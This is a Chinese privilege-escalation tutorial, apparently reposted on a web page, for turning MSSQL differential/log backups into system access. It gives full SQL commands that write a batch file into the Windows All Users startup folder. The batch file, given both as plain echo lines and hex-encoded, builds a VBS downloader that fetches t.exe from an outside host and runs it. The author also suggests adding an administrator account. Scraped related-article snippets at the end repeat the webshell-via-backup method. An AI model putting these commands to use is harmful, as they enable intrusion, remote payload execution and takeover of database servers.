提权思路之MSSQL差异备份取系统权限_病毒查杀

MSSQL差异备份获取webshell 几乎人人皆知,那么我们可以利用差异备份出来的文件 当作恶意代码
让系统执行了之后自动提升权限 或者添加管理员吗? 答案当然可以了,kj021320测试了N次之后跟你说!

那么我们得考虑文件摆放的位置~什么地方系统会运行呢?这个其实算是废话吧!
大家不用想都知道 通用地方 C:\Documents and Settings\All Users\「开始」菜单\程序\启动
呵呵位置有了! 那么我们备份什么文件让系统能执行的呢?
这个是第一个关键点~!
EXE JS VBS BAT这些文件大家第一时间想到的了
那些我一个一个来分析 exe的话!绝对能了! 但是 MSSQL差异备份这么多垃圾肯定会把exe弄坏的!
否决掉
然后到脚本
VBS 我们能不能把 他的垃圾信息注释掉呢? 不然VBS 会执行不了! OK 学过VBS的朋友都知道
VBS里面 有2种注释 ' 还有就是 rem
但是还是会有垃圾信息屏蔽不了
否决掉

JS呢? JS里面有多行注释的/**/ 但是 /* 不可能在首行吧?
否决掉

最后 剩下我们最熟悉的bat批处理了!
OK我们继续分析 bat里面注释是什么呢?也是REM,失败啊!之前vbs那里不行 这里的rem注释也一样不行的!
那么我们怎么办呢?其实很简单! 当我们在CMD下面敲错了命令系统会怎样呢?

说到这里 要是大家不往文章下面看也一样能想到方法了吧~

OK我们继续探~~这里是最最关键点,差异备份出来的垃圾信息我们可以通过用回车把他提交了!
而系统只当作无用的命令来处理!不影响我们的操作!
问题就这样解决了吗?不是的!~MSSQL备份的时候,到一定的字符长度就会出现垃圾的字符,那个字符会影响我们的操作!
那么我们得把语句尽量缩少,越少越好~
OK那我们思路好了就采用bat 写一个VBS的下载者 然后执行这个下载者 最后通过下载者down回来的马子来获取系统权限
下面是我改过的生成下载者的BAT

echo Set P=createObject("Microsoft.XMLHTTP")>k.vbs
echo P.Open "GET","http://www.isto.cn/t.exe",0 >>k.vbs
echo P.Send():set G=createObject("ADODB.Stream")>>k.vbs
echo G.Mode=3:G.Type=1:G.Open() >>k.vbs 
echo G.Write P.ResponseBody:G.SaveToFile "t.exe",2 >>k.vbs
k.vbs
t

下一个k.VBS然后k.vbs下载一个t.exe文件保存到本地 直接执行
记得记得我说过的代码前面一定要用回车把垃圾数据提交 最好2以上个回车
然后实现差异备份

alter database ISTO set RECOVERY FULL--
create table cmd (a image)--
backup log ISTO to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D6963726F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2022474554222C22687474703A2F2F7777772E6973746F2E636E2F742E657865222C30203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D6372656174654F626A656374282241444F44422E53747265616D22293E3E6B2E7662730D0A6563686F20472E4D6F64653D333A472E547970653D313A472E4F70656E2829203E3E6B2E76627320200D0A6563686F20472E577269746520502E526573706F6E7365426F64793A472E53617665546F46696C652022742E657865222C32203E3E6B2E7662730D0A6B2E7662730D0A740D0A)--
backup log ISTO to disk = 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\1.bat'--
drop table cmd--

OK bat出来了! 至于怎样让服务器重启呢!这个问题遗留给你们去讨论吧!
要是服务器直接开启了3389 那就更方便了! 直接bat 一个添加管理员的命令更爽!

时间: 2024-11-08 21:31:00

提权思路之MSSQL差异备份取系统权限_病毒查杀的相关文章

MSSQL差异备份取系统权限的相关软件下载_MsSql

昨天在网上找资料的时间无意进了一个站,糊里糊涂就进去了,想提权提不起来,后来加上服务商的Q号想社工一下,射了半天得知服务器的安全是绿盟的人给做的 安全,后来就问猪猪有什么提权的方法没,他刚好做了这个动画就给发来过来,在网上查了一下找到了文章,一起拷贝过来.最近忙着学习很少关注这方面的东西, 落后了,落后了...... 下面是是在网上找到的资料和动画.   TEAM里的内部资料放久了,现在不放出来,迟早会有人发掘出来的!既然如此就拿出来大家分享吧! MSSQL差异备份获取webshell 几乎人人

卡巴病毒库备份工具 专用版!_病毒查杀

卡巴病毒库备份工具 专用版! 每次GHOST还原系统后,最麻烦的恐怕就是等待更新病毒库了,而且那个卡巴,可能是 身体不太好,升级真的是太慢太慢了,呵呵! 所以自己就写了这个卡巴病毒库更新软件,网上也有相关软件,可是感觉用着不爽,呵呵,大家感觉那个舒服就用那个吧! 点击下载

复习一下sql server的差异备份_MsSql

MSSQL差异备份,就是和前一次备份作对比,把不一样的内容备份下来,这样,只要前一次备份后,插入新的内容,差异备份就可以把刚插入的内容备份出来,而这个备份文件将大大减少,得到webShell的成功也提高了不少!  差异备份的流程大概这样: 1.完整备份一次(保存位置当然可以改) backup database 库名 to disk = 'c:\ddd.bak';-- 2.创建表并插曲入数据 create table [dbo].[dtest] ([cmd] [image]); insert in

差异备份-mssql 全备+差备还原,求帮忙解决!坐等!急!!!

问题描述 mssql 全备+差备还原,求帮忙解决!坐等!急!!! 对数据库做全备与差备的周期性备份,现在要还原数据库,还原的步骤为:最新的全备一份+最新的差备一份,但是在点确认的时候跳出如图的错误提示: 请问该如何解决这个问题?谢谢!!! 解决方案 分享完整备份+差异备份还原数据库的方法:http://www.cnblogs.com/ivanyb/archive/2013/01/23/2873437.html 解决方案二: http://blog.sqlauthority.com/2009/09

mssql数据库差异备份方法

手工实现差异备份的步骤 字符型: 1.恢复当前库 ;alter database 当前库 set recovery full-- 2.建表cmd ;create table cmd (a image)-- 3.备份当前库到d:cmd1 ;backup log 当前库 to disk = 'd:cmd1' with init-- 4.插入一句话代码到创建的表cmd ;insert into cmd (a) values ('<%%25**ecute(request("a"))%%2

Windows 提权实录技巧

这篇文章中我会讲Windows上一般提权的方法,并演示如何手动进行提权和其对应的Metasploit模块.当我们把权限从本地管理员提升到系统后更容易执行一些操作,而不适当的系统配置则可以使低权限的用户将自己的权限提升到高权限. Note:本文中我们主要关注于不依赖内核漏洞的提权,例如:KiTrap0d(Meterpreter getsystem提权的四种方法之一) Trusted Service Paths 这个漏洞存在于二进制服务文件路径中Windows错误解释空格.这些服务通常都是以系统权限

linux入侵提权(服务器提权)方法

  利用mysql root提权方法 mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内. 一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如斯这般.今天我们换一种方式. 按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有

Wordpress4.2.3提权与SQL注入漏洞分析

这是这几天一直关注的漏洞了,wordpress上个礼拜发布的4.2.4版本,其中提到修补了可能存在的SQL漏洞和多个XSS. Check point也很快发出了分析,我也来分析与复现一下最新的这个漏洞.   0x01 GP混用造成的越权漏洞 首先,说明一下背景.wordpress中用户权限分为订阅者.投稿者.作者.编辑和管理员. 权限最低的是订阅者,订阅者只有订阅文章的权限,wordpress开启注册后默认注册的用户就是订阅者.国内很多知名网站,如Freebuf,用户注册后身份即为“订阅者”.

快照不是表象 网站提权从更新快照做起

  虽然搜索引擎一再强调,网站快照只是搜索引擎收录网站的一个日期记录,没有必要过于深究,而且谷歌等一些搜索引擎刻意的隐去快照更新日期.但事情的另一方面却是,从已经发生的实例足可以证明,快照与网站权重存在某种联系.网站排名好,权重高的一些网站,快照更新相当频繁;而快照退档即意味着网站已经或将降权,退档日期内能肯定有一些做法不甚妥当;长时间不更新快照的一些网站,至少说明网站是没有太多新内容的.如果不断的发布新内容,网站却依旧持久不更新,那就是个很危险的信号,很可能网站被降权了.在交换链接的时候,也大